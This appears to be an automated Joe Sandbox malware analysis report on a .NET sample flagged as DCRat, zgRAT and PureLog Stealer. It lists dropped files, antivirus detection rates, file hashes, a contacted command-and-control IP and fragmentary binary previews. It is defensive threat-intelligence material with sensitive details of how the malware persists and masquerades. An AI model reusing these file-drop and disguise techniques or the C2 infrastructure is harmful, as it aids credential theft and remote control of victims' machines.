C:\Users\user\Desktop\ijuwfDOX.log, PE32 58->89 dropped 91 10 other malicious files 58->91 dropped 67 cmd.exe 58->67         started        process23

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            KPFv8ATDx0.exe71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            KPFv8ATDx0.exe100%AviraHEUR/AGEN.1329680
                            KPFv8ATDx0.exe100%Joe Sandbox ML

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\Users\user\AppData\Local\Temp\cWXsH5vMZ0.bat100%AviraBAT/Delbat.C
                            C:\Users\user\AppData\Local\Temp\bqMLTwU6O8.bat100%AviraBAT/Delbat.C
                            C:\Users\user\AppData\Local\Temp\yJr0BespZg.bat100%AviraBAT/Delbat.C
                            C:\Users\user\AppData\Local\Temp\aehWhM7TGU.bat100%AviraBAT/Delbat.C
                            C:\Users\user\Desktop\CKTJbAfr.log100%AviraTR/AVI.Agent.updqb
                            C:\Users\user\AppData\Local\Temp\TqMgut2j0M.bat100%AviraBAT/Delbat.C
                            C:\Users\user\AppData\Local\Temp\JRGN3N9ZXF.bat100%AviraBAT/Delbat.C
                            C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exe100%AviraHEUR/AGEN.1329680
                            C:\Users\user\Desktop\ACAUZvYN.log100%AviraTR/Agent.jbwuj
                            C:\Users\user\AppData\Local\Temp\4XCyKdTKaY.bat100%AviraBAT/Delbat.C
                            C:\Users\user\AppData\Local\Temp\bgR6NVhjy4.bat100%AviraBAT/Delbat.C
                            C:\Users\user\AppData\Local\Temp\pFxSEGDzP3.bat100%AviraBAT/Delbat.C
                            C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exe100%AviraHEUR/AGEN.1329680
                            C:\Users\user\AppData\Local\Temp\iHmrx8Dkeu.bat100%AviraBAT/Delbat.C
                            C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exe100%AviraHEUR/AGEN.1329680
                            C:\Users\user\Desktop\BXwkEeIS.log100%Joe Sandbox ML
                            C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exe100%Joe Sandbox ML
                            C:\Users\user\Desktop\AHwNgZaF.log100%Joe Sandbox ML
                            C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exe100%Joe Sandbox ML
                            C:\Users\user\Desktop\EZPbybNn.log100%Joe Sandbox ML
                            C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exe100%Joe Sandbox ML
                            C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exe71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Program Files\Windows Defender\oqWNZWQNWoNnROlqjKcKhLM.exe71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Program Files\Windows Multimedia Platform\oqWNZWQNWoNnROlqjKcKhLM.exe71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\Desktop\ACAUZvYN.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                            C:\Users\user\Desktop\AHwNgZaF.log5%ReversingLabs
                            C:\Users\user\Desktop\ARClkDgk.log17%ReversingLabs
                            C:\Users\user\Desktop\AWvLLWqc.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                            C:\Users\user\Desktop\BXwkEeIS.log5%ReversingLabs
                            C:\Users\user\Desktop\CGsDyrOn.log12%ReversingLabs
                            C:\Users\user\Desktop\CKTJbAfr.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\Desktop\CnRDnDvx.log12%ReversingLabs
                            C:\Users\user\Desktop\CqTJEOHT.log17%ReversingLabs
                            C:\Users\user\Desktop\CvAVSmWD.log17%ReversingLabs
                            C:\Users\user\Desktop\CyIkUInh.log21%ReversingLabs
                            C:\Users\user\Desktop\EZPbybNn.log5%ReversingLabs
                            C:\Users\user\Desktop\FCcCDjRB.log17%ReversingLabs
                            C:\Users\user\Desktop\FTyBLKyM.log12%ReversingLabs
                            C:\Users\user\Desktop\FvOMJVpt.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                            C:\Users\user\Desktop\FxClgbOG.log12%ReversingLabs
                            C:\Users\user\Desktop\GKfLNjlY.log8%ReversingLabs
                            C:\Users\user\Desktop\GLOjgbXG.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                            C:\Users\user\Desktop\GoybbFob.log5%ReversingLabs
                            C:\Users\user\Desktop\GxRSZgBO.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\Desktop\IHWAbonb.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                            C:\Users\user\Desktop\IPEdAXAX.log17%ReversingLabs
                            C:\Users\user\Desktop\JEwTrooN.log8%ReversingLabs
                            C:\Users\user\Desktop\KFhcUPbS.log21%ReversingLabsByteCode-MSIL.Trojan.Generic
                            C:\Users\user\Desktop\KpuBgggp.log8%ReversingLabs
                            C:\Users\user\Desktop\LWkTXfAf.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\Desktop\LcQaEBDP.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                            C:\Users\user\Desktop\LljRCdQC.log17%ReversingLabs
                            C:\Users\user\Desktop\LqfKJGTv.log5%ReversingLabs
                            C:\Users\user\Desktop\MtmZLckZ.log12%ReversingLabs
                            C:\Users\user\Desktop\NgGUXyfg.log24%ReversingLabs
                            C:\Users\user\Desktop\NqOhhczU.log21%ReversingLabs
                            C:\Users\user\Desktop\NvmJyloG.log21%ReversingLabsByteCode-MSIL.Trojan.Generic
                            C:\Users\user\Desktop\ObZHJZRv.log24%ReversingLabs
                            C:\Users\user\Desktop\OgVBQDTo.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\Desktop\OkvSnMWj.log21%ReversingLabsByteCode-MSIL.Trojan.Generic
                            C:\Users\user\Desktop\OqbZUiZT.log17%ReversingLabs
                            C:\Users\user\Desktop\OwGrvDOt.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\Desktop\PAkihvfV.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                            C:\Users\user\Desktop\PFIKyDTH.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\Desktop\PYmimUsi.log21%ReversingLabs
                            C:\Users\user\Desktop\PthzQDco.log8%ReversingLabs
                            C:\Users\user\Desktop\QYBPfZgq.log8%ReversingLabs
                            C:\Users\user\Desktop\RONsALFU.log17%ReversingLabs
                            C:\Users\user\Desktop\RyZipATO.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\Desktop\SIxHSvEB.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\Desktop\SeerDZBz.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\Desktop\SmOJiIbE.log17%ReversingLabs
                            C:\Users\user\Desktop\TraZorfO.log5%ReversingLabs
                            C:\Users\user\Desktop\TvAqLAiJ.log8%ReversingLabs
                            C:\Users\user\Desktop\UCgheeoa.log17%ReversingLabs
                            C:\Users\user\Desktop\UTCgmFWk.log21%ReversingLabsByteCode-MSIL.Trojan.Generic
                            C:\Users\user\Desktop\UTTISNjC.log24%ReversingLabs
                            C:\Users\user\Desktop\UYcyJOZf.log17%ReversingLabs
                            C:\Users\user\Desktop\VcGpvFqH.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\Desktop\VggGSNtC.log17%ReversingLabs
                            C:\Users\user\Desktop\VijSQbQY.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                            C:\Users\user\Desktop\VuurXSIi.log17%ReversingLabs
                            C:\Users\user\Desktop\VxlkbjYv.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                            C:\Users\user\Desktop\WQvQoNyx.log8%ReversingLabs
                            C:\Users\user\Desktop\WhRPvofH.log24%ReversingLabs
                            C:\Users\user\Desktop\XOEIXFmQ.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\Desktop\XaOgexda.log24%ReversingLabs
                            C:\Users\user\Desktop\YBagvbJq.log17%ReversingLabs
                            C:\Users\user\Desktop\YHFyVwyQ.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                            C:\Users\user\Desktop\YMBsdaAI.log8%ReversingLabs
                            C:\Users\user\Desktop\YPpRAgYW.log24%ReversingLabs
                            C:\Users\user\Desktop\YWHQgFFn.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                            C:\Users\user\Desktop\abhXZtjw.log24%ReversingLabs
                            C:\Users\user\Desktop\axOHLXft.log17%ReversingLabs
                            C:\Users\user\Desktop\cCsjkXAC.log21%ReversingLabsByteCode-MSIL.Trojan.Generic
                            C:\Users\user\Desktop\cxwpdtyJ.log17%ReversingLabs

                            Unpacked PE Files

                            No Antivirus matches

                            Domains

                            No Antivirus matches

                            URLs

                            SourceDetectionScannerLabelLink
                            http://38.180.228.1200%Avira URL Cloudsafe

                            Domains and IPs

                            Contacted Domains

                            No contacted domains info

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameKPFv8ATDx0.exe, 00000000.00000002.1338858265.0000000003270000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000007.00000002.1443752211.000000000325A000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000000E.00000002.1575711347.0000000003576000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000014.00000002.1687002549.0000000002B97000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000001A.00000002.1826603287.0000000003882000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000022.00000002.1931052438.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000028.00000002.2055005973.000000000290C000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000002E.00000002.2158413526.0000000002AD9000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000034.00000002.2284751701.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000003A.00000002.2425833967.000000000368A000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://38.180.228.120oqWNZWQNWoNnROlqjKcKhLM.exe, 00000007.00000002.1443752211.000000000325A000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000000E.00000002.1575711347.0000000003576000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000014.00000002.1687002549.0000000002B97000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000001A.00000002.1826603287.0000000003882000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000022.00000002.1931052438.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000028.00000002.2055005973.000000000290C000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000002E.00000002.2158413526.0000000002AD9000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000034.00000002.2284751701.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000003A.00000002.2425833967.000000000368A000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: safe
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              38.180.228.120
                              		unknownUnited States
                              		174COGENT-174UStrue

                              General Information

                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1558732
                              Start date and time:2024-11-19 18:51:08 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 13m 19s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:72
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:KPFv8ATDx0.exe
                              renamed because original name is a hash value
                              Original Sample Name:3ff58b353cd7e1b70eb300561e146e6c.exe
                              Detection:MAL
                              Classification:mal100.troj.evad.winEXE@83/166@0/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:Failed
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Override analysis time to 240000 for current running targets taking high CPU consumption

                              Warnings

                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, dllhost.exe, SIHClient.exe, conhost.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report creation exceeded maximum time and may have missing disassembly code information.
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size exceeded maximum capacity and may have missing disassembly code.
                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • VT rate limit hit for: KPFv8ATDx0.exe

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              12:52:22API Interceptor9x Sleep call for process: oqWNZWQNWoNnROlqjKcKhLM.exe modified

                              Joe Sandbox View / Context

                              IPs

                              No context

                              Domains

                              No context

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              COGENT-174USexe009.exeGet hashmaliciousEmotetBrowse
                              • 185.142.236.163
                              owari.arm.elfGet hashmaliciousUnknownBrowse
                              • 38.169.130.37
                              owari.spc.elfGet hashmaliciousUnknownBrowse
                              • 38.247.191.82
                              owari.sh4.elfGet hashmaliciousUnknownBrowse
                              • 38.5.199.111
                              owari.ppc.elfGet hashmaliciousUnknownBrowse
                              • 154.40.28.170
                              7YFNIkCSoS.elfGet hashmaliciousSNOWLIGHTBrowse
                              • 38.45.124.194
                              aXsdxSDEig.elfGet hashmaliciousUnknownBrowse
                              • 38.45.124.194
                              PO 20495088.exeGet hashmaliciousFormBookBrowse
                              • 149.115.238.44
                              iDvmIRCPBw.exeGet hashmaliciousUnknownBrowse
                              • 143.244.215.221
                              ZdXUGLQpoL.exeGet hashmaliciousUnknownBrowse
                              • 143.244.215.221

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              C:\Users\user\Desktop\ACAUZvYN.logT0jSGXdxX5.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                main.exeGet hashmaliciousDCRat, Discord Token Stealer, Millenuim RAT, PureLog Stealer, zgRATBrowse
                                  file_1443.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    lsass.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      t8xf0Y1ovi.exeGet hashmaliciousDCRatBrowse
                                        dvc2TBOZTh.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                          teh76E2k50.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                            FuWRu2Mg82.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                              auXl1Tzyme.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                9D7RwuJrth.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

                                                  Created / dropped Files

                                                  C:\Program Files\Internet Explorer\en-GB\0b77faa1f189a8

                                                  Download File
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:ASCII text, with very long lines (804), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):804
                                                  Entropy (8bit):5.901464329550629
                                                  Encrypted:false
                                                  SSDEEP:24:tQM34Ah5SWMNWLUJGH1m0S9/LRqnOBNN8Jon:tQmV9LqOm0oonOBNNKon
                                                  MD5:AC30216A342168C423A34D3C83403D2A
                                                  SHA1:AF938A1CBF6ED1C76013C76A2202EA7E9644957A
                                                  SHA-256:2457BEC6B72DCCCA0838EF36A62A021669132FB56AADB36146A980A03E545207
                                                  SHA-512:B1FAC2221BB52AB04AF02910C4C6F88F3052AA8C7F3A2169B0EB8BE62FC2DFF15C9799AA0FD76C628305151668FDBE70902A846BAE3BE656AC92F9DF5F801E49
                                                  Malicious:false
                                                  Preview:5EXg88kXMfZdxz1FnLAlLg32uwixHoNHYwxUKKz6CRbGTvz9SHhMKlmYLevMZwQiRSFACg4dWDj3Fwj96je9HB6wKYJpYmgPB2yBpy7vND0GCsTY5wP0SQaQWS0nXOFthU2M7hTIlswELzubFutlWp7ucipW8TY87Gjr0GbYcHOjeWEgiYhmedW1XHuY26KSUyGEPCl9TVIPaXQFdIyjwvddtrUsVCfg76OqQ9RfwiSJVHb91o5uIkfiUmVir2oRzmRdJkzd1SxNdUImQV1qHvYXaqVnosy33BTsz70Rzb2zxSFAetSWB7KEO4CdOMyIe3TbAZwSfj1p2ijIkVJ5ab261Pe54XDnmuV48o9E691bGeLqU322C3rDBXjv51XIgNCINpK6VF8bkazWDxkAeKktCS3kENIFlt42bCcot6g74QckhMrIQWnWnTF5wj1I73z1f75AV5RhnnywzSD1fAyOFiPI7h1JFY9BalFkRqwVFGt9eSFeg9m7Elw7rwDxDHcOoxWNNckyNdJ8zPnpbXnFwC6yzH2fn9R7neVr52RDZxulcxIcIYVqeWbl0hYFkELNMLUU46tjGjq9SVWC9aWPnkdRCt0XdLdUmgZRcxhMowj4qcTfLWFKs5klrDRKFVG4GVXv6FjM2Kk1AikkZVMHGSmq5xjYgWGTqpxVFiiGw3RiVtkIdrvtJ9yxtq0IfLqgDRKVuPe1wFUMBDVMNa4ylWKr0AlYraklNvfEiOXON37DolwpVn4EQ14qGdfunFJWft9QiQn9DqlsZHCOO5DEfgUV1z7EsmkH

                                                  C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):2882048
                                                  Entropy (8bit):7.745071784980981
                                                  Encrypted:false
                                                  SSDEEP:49152:doz78EGeqP/Zmz0nTgMRMD69C5XO8ArPoD2W89weVBeLQ4:doX8aIZLMD6k+8aPM2W8WCes4
                                                  MD5:3FF58B353CD7E1B70EB300561E146E6C
                                                  SHA1:D9059F5389FAD25F1BF44B7332C018F806159DF9
                                                  SHA-256:15892ECB245A5C3AA1AB94D60ED1D034540B14623BDC6F27ACFA1F0A5791ED33
                                                  SHA-512:7F2E55642CB0229C5F0BBA1A6C7930855258B3FBEE3AB033D1802C157C4AFEC02750B1B7339AFEB7E0BC265FE452D94D7D9826BCF28DC657496DF0BE43E6E935
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exe, Author: Joe Security
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................+...........,.. ... ,...@.. .......................`,...........@.................................`.,.K.... ,.p....................@,...................................................... ............... ..H............text.....+.. ....+................. ..`.rsrc...p.... ,.......+.............@....reloc.......@,.......+.............@..B..................,.....H...........H.......n......./!...,......................................0..........(.... ........8........E........*...9.......8....*(.... ....~d...{....:....& ....8....(.... ....8....(.... ....~d...{s...:....& ....8........0.......... ........8........E....5...).......E...........80...8*... ....~d...{....:....& ....8....r...ps....z*...... ....8........~....(]...~....(a... ....?.... ....~d...{m...:h...& ....8]...~....(U... .... .... ....s....~....(Y....... ....8'...~....9o..

                                                  C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exe:Zone.Identifier

                                                  Download File
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:true
                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                  C:\Program Files\Windows Defender\0b77faa1f189a8

                                                  Download File
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:ASCII text, with very long lines (707), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):707
                                                  Entropy (8bit):5.872700467054722
                                                  Encrypted:false
                                                  SSDEEP:12:RdLORN2vco3zWPZw+W5oyLNDX4WAje6cknAE9epiSK4zp4dckCZG+4AVgIRQNuCQ:/CNYzWqbiyhXxPIN9egap44jTQuCQOpm
                                                  MD5:3C8E4D478AB3CDB31C89736FE9CFAD04
                                                  SHA1:5A1BA25559AF4D1100366114AD1420D59FECEEE9
                                                  SHA-256:8EA74ED1BEB324B482CF6E4ED6379BD625A4BC1670EC493280C184FA70B9BA53
                                                  SHA-512:768C4167FD68B4DB2D9524D18BAF93F4B148DDA0492ECC79CE333D5DA54C0448E605DE5FCB21FC23641AB667A4071A1B91D375488BAF79A7CCB9AC3214B175F1
                                                  Malicious:false
                                                  Preview:rnRySHUuh34MBKqLHFcu7LMM5a8xjS4EBd5LRS5fr61XlVNKfR48kvtgaE22IhLO9zLhPe3yK7CBTzlkNxSRX6eQtZuMZDWKumXvKp5AXFynssMlcSoVO41CV5x0tqZHk2Qrb0Zh1R3RI0hBMJuHYB50vVZP2FRqqqC0cfJm2Hd7Aj4eXwnj6Rsj7Z5GaKpvANlbyqirAHPQh70Ma41FcrtZ7c3DjDLrcr6x8cqrN5jzCcB9itpgTjTTdLdVxfI65hy0BDN8OK1hH4Xfb3e0XpY2YnTw9U3sxm4eoL8ffrRIrwLiy743BSjPJ5bXtb83QJteA21P59UqYPKlbv7Ba9qfDoUstkvDsY2hCri5Gp8B7214u058e7cRdOaViIfUOQ79XnjuMB5vAohKxa83pwjv5kEyQMX7Jnxq51gHQLvcCrQyqQiHKmpbqMEwiveAn7lX00P531meAHsNTQH9oPxh8WAsxujfqvyFG37zAnOT9Lajd0dRneVYJEYe0hHJSHxPSnHaSR9BBeix6aO7QR1Maa5Bfd8dfEA1XLR0sD9VfUWofliaSK2APkz1rF4zTff6dqZuIYPNRgrFDRf34iLVMAmxWZImIJC9yaKzMxR35ptt3tyakB4uTKudEmYsQmFIdrRmGqrHQRahR23mlrCGORpoqqukYinSjkQLcLT3TxeCuMMLsvHik83LBm6Z5Hs

                                                  C:\Program Files\Windows Defender\oqWNZWQNWoNnROlqjKcKhLM.exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):2882048
                                                  Entropy (8bit):7.745071784980981
                                                  Encrypted:false
                                                  SSDEEP:49152:doz78EGeqP/Zmz0nTgMRMD69C5XO8ArPoD2W89weVBeLQ4:doX8aIZLMD6k+8aPM2W8WCes4
                                                  MD5:3FF58B353CD7E1B70EB300561E146E6C
                                                  SHA1:D9059F5389FAD25F1BF44B7332C018F806159DF9
                                                  SHA-256:15892ECB245A5C3AA1AB94D60ED1D034540B14623BDC6F27ACFA1F0A5791ED33
                                                  SHA-512:7F2E55642CB0229C5F0BBA1A6C7930855258B3FBEE3AB033D1802C157C4AFEC02750B1B7339AFEB7E0BC265FE452D94D7D9826BCF28DC657496DF0BE43E6E935
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................+...........,.. ... ,...@.. .......................`,...........@.................................`.,.K.... ,.p....................@,...................................................... ............... ..H............text.....+.. ....+................. ..`.rsrc...p.... ,.......+.............@....reloc.......@,.......+.............@..B..................,.....H...........H.......n......./!...,......................................0..........(.... ........8........E........*...9.......8....*(.... ....~d...{....:....& ....8....(.... ....8....(.... ....~d...{s...:....& ....8........0.......... ........8........E....5...).......E...........80...8*... ....~d...{....:....& ....8....r...ps....z*...... ....8........~....(]...~....(a... ....?.... ....~d...{m...:h...& ....8]...~....(U... .... .... ....s....~....(Y....... ....8'...~....9o..

                                                  C:\Program Files\Windows Defender\oqWNZWQNWoNnROlqjKcKhLM.exe:Zone.Identifier

                                                  Download File
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:false
                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                  C:\Program Files\Windows Multimedia Platform\0b77faa1f189a8

                                                  Download File
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:ASCII text, with very long lines (775), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):775
                                                  Entropy (8bit):5.880971557781576
                                                  Encrypted:false
                                                  SSDEEP:24:Kmc8fxzsgDqPomnLcLUi96IODdwjbgNbW:KmcAxzsoqPo+WUa6Rwjb+W
                                                  MD5:B2E90DE55693C31DE23D73D304A9C50A
